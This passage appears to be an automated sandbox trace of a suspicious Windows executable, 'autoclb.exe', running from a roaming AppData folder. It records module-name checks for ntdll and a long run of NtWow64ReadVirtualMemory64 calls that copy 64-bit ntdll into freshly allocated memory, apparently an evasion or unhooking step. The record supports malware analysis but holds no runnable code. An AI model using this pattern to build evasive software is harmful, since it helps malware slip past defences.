ProcessInformationLength=0x30, ReturnLength=0x5df468 | out: ProcessInformation64=0x5df414, ReturnLength=0x5df468) returned 0x0 [0076.745] StrRChrA (lpStart="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpEnd=0x0, wMatch=0x5c) returned="\\autoclb.exe" [0076.745] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0076.745] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0076.745] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0076.745] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0076.745] lstrcmpiA (lpString1="autoclb.exe", lpString2="NTDLL.DLL") returned -1 [0076.745] StrChrA (lpStart="autoclb.exe", wMatch=0x2e) returned=".exe" [0076.745] lstrcmpiA (lpString1="autoclb", lpString2="NTDLL.DLL") returned -1 [0076.745] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0076.745] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.745] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x2580000 [0076.746] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee380000, Buffer=0x7ff8, BufferSize=0x2580000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.746] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee381000, Buffer=0x7ff8, BufferSize=0x2581000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.746] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee382000, Buffer=0x7ff8, BufferSize=0x2582000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.746] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee383000, Buffer=0x7ff8, BufferSize=0x2583000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.746] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee384000, Buffer=0x7ff8, BufferSize=0x2584000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.747] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee385000, Buffer=0x7ff8, BufferSize=0x2585000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.747] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee386000, Buffer=0x7ff8, BufferSize=0x2586000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.747] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee387000, Buffer=0x7ff8, BufferSize=0x2587000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.747] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee388000, Buffer=0x7ff8, BufferSize=0x2588000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.747] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee389000, Buffer=0x7ff8, BufferSize=0x2589000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.747] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38a000, Buffer=0x7ff8, BufferSize=0x258a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.747] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38b000, Buffer=0x7ff8, BufferSize=0x258b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.748] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38c000, Buffer=0x7ff8, BufferSize=0x258c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.748] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38d000, Buffer=0x7ff8, BufferSize=0x258d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.748] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38e000, Buffer=0x7ff8, BufferSize=0x258e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.748] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38f000, Buffer=0x7ff8, BufferSize=0x258f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.748] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee390000, Buffer=0x7ff8, BufferSize=0x2590000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.748] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee391000, Buffer=0x7ff8, BufferSize=0x2591000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.748] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee392000, Buffer=0x7ff8, BufferSize=0x2592000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.749] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee393000, Buffer=0x7ff8, BufferSize=0x2593000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.749] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee394000, Buffer=0x7ff8, BufferSize=0x2594000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.749] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee395000, Buffer=0x7ff8, BufferSize=0x2595000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.749] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee396000, Buffer=0x7ff8, BufferSize=0x2596000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.749] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee397000, Buffer=0x7ff8, BufferSize=0x2597000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.749] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee398000, Buffer=0x7ff8, BufferSize=0x2598000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.749] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee399000, Buffer=0x7ff8, BufferSize=0x2599000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.749] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39a000, Buffer=0x7ff8, BufferSize=0x259a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.750] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39b000, Buffer=0x7ff8, BufferSize=0x259b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.750] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39c000, Buffer=0x7ff8, BufferSize=0x259c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.750] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39d000, Buffer=0x7ff8, BufferSize=0x259d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.750] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39e000, Buffer=0x7ff8, BufferSize=0x259e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.750] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39f000, Buffer=0x7ff8, BufferSize=0x259f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.750] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a0000, Buffer=0x7ff8, BufferSize=0x25a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.750] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a1000, Buffer=0x7ff8, BufferSize=0x25a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.751] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a2000, Buffer=0x7ff8, BufferSize=0x25a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.751] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a3000, Buffer=0x7ff8, BufferSize=0x25a3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.751] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a4000, Buffer=0x7ff8, BufferSize=0x25a4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.751] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a5000, Buffer=0x7ff8, BufferSize=0x25a5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.751] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a6000, Buffer=0x7ff8, BufferSize=0x25a6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.751] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a7000, Buffer=0x7ff8, BufferSize=0x25a7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.751] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a8000, Buffer=0x7ff8, BufferSize=0x25a8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.752] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a9000, Buffer=0x7ff8, BufferSize=0x25a9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.752] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3aa000, Buffer=0x7ff8, BufferSize=0x25aa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.752] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ab000, Buffer=0x7ff8, BufferSize=0x25ab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.752] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ac000, Buffer=0x7ff8, BufferSize=0x25ac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.752] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ad000, Buffer=0x7ff8, BufferSize=0x25ad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.752] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ae000, Buffer=0x7ff8, BufferSize=0x25ae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.752] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3af000, Buffer=0x7ff8, BufferSize=0x25af000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.753] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b0000, Buffer=0x7ff8, BufferSize=0x25b0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.753] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b1000, Buffer=0x7ff8, BufferSize=0x25b1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.753] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b2000, Buffer=0x7ff8, BufferSize=0x25b2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.753] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b3000, Buffer=0x7ff8, BufferSize=0x25b3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.753] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b4000, Buffer=0x7ff8, BufferSize=0x25b4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.753] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b5000, Buffer=0x7ff8, BufferSize=0x25b5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.753] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b6000, Buffer=0x7ff8, BufferSize=0x25b6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.753] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b7000, Buffer=0x7ff8, BufferSize=0x25b7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.754] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b8000, Buffer=0x7ff8, BufferSize=0x25b8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.754] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b9000, Buffer=0x7ff8, BufferSize=0x25b9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.754] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ba000, Buffer=0x7ff8, BufferSize=0x25ba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.754] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bb000, Buffer=0x7ff8, BufferSize=0x25bb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.754] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bc000, Buffer=0x7ff8, BufferSize=0x25bc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.754] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bd000, Buffer=0x7ff8, BufferSize=0x25bd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.754] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3be000, Buffer=0x7ff8, BufferSize=0x25be000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.755] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bf000, Buffer=0x7ff8, BufferSize=0x25bf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.755] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c0000, Buffer=0x7ff8, BufferSize=0x25c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.755] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c1000, Buffer=0x7ff8, BufferSize=0x25c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.755] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c2000, Buffer=0x7ff8, BufferSize=0x25c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.755] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c3000, Buffer=0x7ff8, BufferSize=0x25c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.755] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c4000, Buffer=0x7ff8, BufferSize=0x25c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.755] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c5000, Buffer=0x7ff8, BufferSize=0x25c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.756] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c6000, Buffer=0x7ff8, BufferSize=0x25c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.756] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c7000, Buffer=0x7ff8, BufferSize=0x25c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.756] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c8000, Buffer=0x7ff8, BufferSize=0x25c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.756] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c9000, Buffer=0x7ff8, BufferSize=0x25c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.756] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ca000, Buffer=0x7ff8, BufferSize=0x25ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.756] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cb000, Buffer=0x7ff8, BufferSize=0x25cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.756] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cc000, Buffer=0x7ff8, BufferSize=0x25cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.756] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cd000, Buffer=0x7ff8, BufferSize=0x25cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.757] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ce000, Buffer=0x7ff8, BufferSize=0x25ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.757] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cf000, Buffer=0x7ff8, BufferSize=0x25cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.757] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d0000, Buffer=0x7ff8, BufferSize=0x25d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.757] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d1000, Buffer=0x7ff8, BufferSize=0x25d1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.757] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d2000, Buffer=0x7ff8, BufferSize=0x25d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.757] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d3000, Buffer=0x7ff8, BufferSize=0x25d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.758] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d4000, Buffer=0x7ff8, BufferSize=0x25d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.758] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d5000, Buffer=0x7ff8, BufferSize=0x25d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.758] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d6000, Buffer=0x7ff8, BufferSize=0x25d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.758] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d7000, Buffer=0x7ff8, BufferSize=0x25d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.758] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d8000, Buffer=0x7ff8, BufferSize=0x25d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.758] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d9000, Buffer=0x7ff8, BufferSize=0x25d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.758] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3da000, Buffer=0x7ff8, BufferSize=0x25da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.758] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3db000, Buffer=0x7ff8, BufferSize=0x25db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.759] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3dc000, Buffer=0x7ff8, BufferSize=0x25dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.759] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3dd000, Buffer=0x7ff8, BufferSize=0x25dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.759] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3de000, Buffer=0x7ff8, BufferSize=0x25de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.759] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3df000, Buffer=0x7ff8, BufferSize=0x25df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.759] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e0000, Buffer=0x7ff8, BufferSize=0x25e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.759] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e1000, Buffer=0x7ff8, BufferSize=0x25e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.760] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e2000, Buffer=0x7ff8, BufferSize=0x25e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.760] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e3000, Buffer=0x7ff8, BufferSize=0x25e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.760] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e4000, Buffer=0x7ff8, BufferSize=0x25e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.760] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e5000, Buffer=0x7ff8, BufferSize=0x25e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.760] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e6000, Buffer=0x7ff8, BufferSize=0x25e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.760] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e7000, Buffer=0x7ff8, BufferSize=0x25e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.761] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e8000, Buffer=0x7ff8, BufferSize=0x25e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.761] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e9000, Buffer=0x7ff8, BufferSize=0x25e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.761] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ea000, Buffer=0x7ff8, BufferSize=0x25ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 